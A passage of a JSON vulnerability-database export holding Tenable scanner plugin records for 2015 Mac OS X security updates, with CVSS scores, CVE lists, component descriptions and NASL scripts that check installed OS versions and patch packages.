"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-10T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273", "CVE-2015-4860", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5944", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6989", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6996", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7016", "CVE-2015-7018", "CVE-2015-7023", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2015-007.NASL", "href": "https://www.tenable.com/plugins/nessus/86829", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86829);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-4860\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5944\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6989\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6996\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7016\",\n \"CVE-2015-7018\",\n \"CVE-2015-7023\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77162,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Updates 2015-004 / 2015-007)\");\n script_summary(english:\"Checks for the presence of Security Update 2015-004 and 2015-007.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.9.5 or 10.10.5\nthat is missing Security Update 2015-004 or 2015-007. It is,\ntherefore, affected by multiple vulnerabilities in the following\ncomponents :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2015-004 / 2015-007 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that update 2015-004 is available for 10.10.5 and update 2015-007 is available for 10.9.5\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(9|10)\\.5([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9.5 or Mac OS X 10.10.5\");\n\nif (\"10.9.5\" >< os) patch = \"2015-007\";\nelse if (\"10.10.5\" >< os) patch = \"2015-004\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-17T15:24:21", "description": "The remote host is running a version of Mac OS X version 10.11.x prior to 10.11.1 and is affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n - ATS (CVE-2015-6985)\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n - Bom (CVE-2015-7006)\n - CFNetwork (CVE-2015-7023)\n - configd (CVE-2015-7015)\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n - Directory Utility (CVE-2015-6980)\n - Disk Images (CVE-2015-6995)\n - EFI (CVE-2015-7035)\n - File Bookmark (CVE-2015-6987)\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n - Grand Central Dispatch (CVE-2015-6989)\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n - IOAcceleratorFamily (CVE-2015-6996)\n - IOHIDFamily (CVE-2015-6974)\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n - libarchive (CVE-2015-6984)\n - MCX Application Restrictions (CVE-2015-7016)\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n - OpenGL (CVE-2015-5924)\n - OpenSSH (CVE-2015-6563)\n - Sandbox (CVE-2015-5945)\n - Script Editor (CVE-2015-7007)\n - Security (CVE-2015-6983, CVE-2015-7024)\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-27T00:00:00", "type": "nessus", "title": "Mac OS X 10.9.5 or later < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6151", "CVE-2014-3565", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5943", "CVE-2015-5944", "CVE-2015-5945", "CVE-2015-6563", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6974", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6980", "CVE-2015-6983", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6987", "CVE-2015-6988", "CVE-2015-6989", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6994", "CVE-2015-6995", "CVE-2015-6996", "CVE-2015-7003", "CVE-2015-7006", "CVE-2015-7007", "CVE-2015-7008", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7015", "CVE-2015-7016", "CVE-2015-7017", "CVE-2015-7018", "CVE-2015-7019", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-7023", "CVE-2015-7024", "CVE-2015-7035"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "9324.PRM", "href": "https://www.tenable.com/plugins/nnm/9324", "sourceData": "Binary data 9324.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:02:26", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or later but prior to 10.11.1 It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273, CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992, CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976, CVE-2015-6977, CVE-2015-6978, CVE-2015-6990, CVE-2015-6991, CVE-2015-6993, CVE-2015-7008, CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020, CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937, CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-10-29T00:00:00", "type": "nessus", "title": "Mac OS X < 10.11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6151", "CVE-2014-3565", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-5924", "CVE-2015-5925", "CVE-2015-5926", "CVE-2015-5927", "CVE-2015-5932", "CVE-2015-5933", "CVE-2015-5934", "CVE-2015-5935", "CVE-2015-5936", "CVE-2015-5937", "CVE-2015-5938", "CVE-2015-5939", "CVE-2015-5940", "CVE-2015-5942", "CVE-2015-5943", "CVE-2015-5944", "CVE-2015-5945", "CVE-2015-6563", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-6974", "CVE-2015-6975", "CVE-2015-6976", "CVE-2015-6977", "CVE-2015-6978", "CVE-2015-6980", "CVE-2015-6983", "CVE-2015-6984", "CVE-2015-6985", "CVE-2015-6987", "CVE-2015-6988", "CVE-2015-6989", "CVE-2015-6990", "CVE-2015-6991", "CVE-2015-6992", "CVE-2015-6993", "CVE-2015-6994", "CVE-2015-6995", "CVE-2015-6996", "CVE-2015-7003", "CVE-2015-7006", "CVE-2015-7007", "CVE-2015-7008", "CVE-2015-7009", "CVE-2015-7010", "CVE-2015-7015", "CVE-2015-7016", "CVE-2015-7017", "CVE-2015-7018", "CVE-2015-7019", "CVE-2015-7020", "CVE-2015-7021", "CVE-2015-7023", "CVE-2015-7024", "CVE-2015-7035"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_1.NASL", "href": "https://www.tenable.com/plugins/nessus/86654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86654);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2012-6151\",\n \"CVE-2014-3565\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5943\",\n \"CVE-2015-5944\",\n \"CVE-2015-5945\",\n \"CVE-2015-6563\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6974\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6980\",\n \"CVE-2015-6983\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6987\",\n \"CVE-2015-6988\",\n \"CVE-2015-6989\",\n \"CVE-2015-6990\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6994\",\n \"CVE-2015-6995\",\n \"CVE-2015-6996\",\n \"CVE-2015-7003\",\n \"CVE-2015-7006\",\n \"CVE-2015-7007\",\n \"CVE-2015-7008\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7015\",\n \"CVE-2015-7016\",\n \"CVE-2015-7017\",\n \"CVE-2015-7018\",\n \"CVE-2015-7019\",\n \"CVE-2015-7020\",\n \"CVE-2015-7021\",\n \"CVE-2015-7023\",\n \"CVE-2015-7024\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 64048,\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X < 10.11.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari User-Assisted Applescript Exec Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Cannot determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfixed_version = \"10.11.1\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:10", "description": "The remote host is running a version of Mac OS X 10.10.x that is prior to 10.10.4. It is, therefore, affected multiple vulnerabilities in the following components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-07-01T00:00:00", "type": "nessus", "title": "Mac OS X 10.10.x < 10.10.4 Multiple Vulnerabilities (GHOST) (Logjam)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-1157", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-3661", "CVE-2015-3662", "CVE-2015-3663", "CVE-2015-3666", "CVE-2015-3667", "CVE-2015-3668", "CVE-2015-3671", "CVE-2015-3672", "CVE-2015-3673", "CVE-2015-3674", "CVE-2015-3675", "CVE-2015-3676", "CVE-2015-3677", "CVE-2015-3678", "CVE-2015-3679", "CVE-2015-3680", "CVE-2015-3681", "CVE-2015-3682", "CVE-2015-3683", "CVE-2015-3684", "CVE-2015-3685", "CVE-2015-3686", "CVE-2015-3687", "CVE-2015-3688", "CVE-2015-3689", "CVE-2015-3690", "CVE-2015-3691", "CVE-2015-3692", "CVE-2015-3693", "CVE-2015-3694", "CVE-2015-3695", "CVE-2015-3696", "CVE-2015-3697", "CVE-2015-3698", "CVE-2015-3699", "CVE-2015-3700", "CVE-2015-3701", "CVE-2015-3702", "CVE-2015-3703", "CVE-2015-3704", "CVE-2015-3705", "CVE-2015-3706", "CVE-2015-3707", "CVE-2015-3708", "CVE-2015-3709", "CVE-2015-3710", "CVE-2015-3711", "CVE-2015-3712", "CVE-2015-3713", "CVE-2015-3714", "CVE-2015-3715", "CVE-2015-3716", "CVE-2015-3717", "CVE-2015-3718", 